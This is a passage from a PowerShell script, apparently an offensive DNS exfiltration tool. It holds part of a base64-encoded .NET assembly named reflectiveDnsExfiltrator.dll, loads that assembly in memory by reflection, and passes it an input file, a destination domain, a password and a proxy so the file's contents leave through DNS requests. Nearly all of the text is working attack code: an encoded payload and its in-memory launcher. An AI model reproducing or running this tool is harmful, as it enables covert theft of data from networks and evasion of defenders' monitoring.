BpAGwAZQBuAGEAbQBlAAAAcgBlAGYAbABlAGMAdABpAHYAZQBEAG4AcwBFAHgAZgBpAGwAdAByAGEAdABvAHIALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAOA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==")
[System.Reflection.Assembly]::Load($DNSExfiltratorLib) | Out-Null
# Prepare arguments
$Args = [System.Collections.ArrayList]@()
$Args.Add($InputFile) | Out-Null
$Args.Add($DomainName) | Out-Null
$Args.Add($Password) | Out-Null
$Args.Add($ProxyServer) | Out-Null
if ($ThrottleTime) {
$Args.Add("t=$ThrottleTime") | Out-Null
}
if ($RequestMaxSize) {
$Args.Add("r=$RequestMaxSize") | Out-Null
}
if ($LabelMaxSize) {
$Args.Add("l=$LabelMaxSize") | Out-Null
}
# Invoke the Main entry point
[ReflectiveDnsExfiltrator.ReflectiveDnsExfiltrator]::Main($Args)
}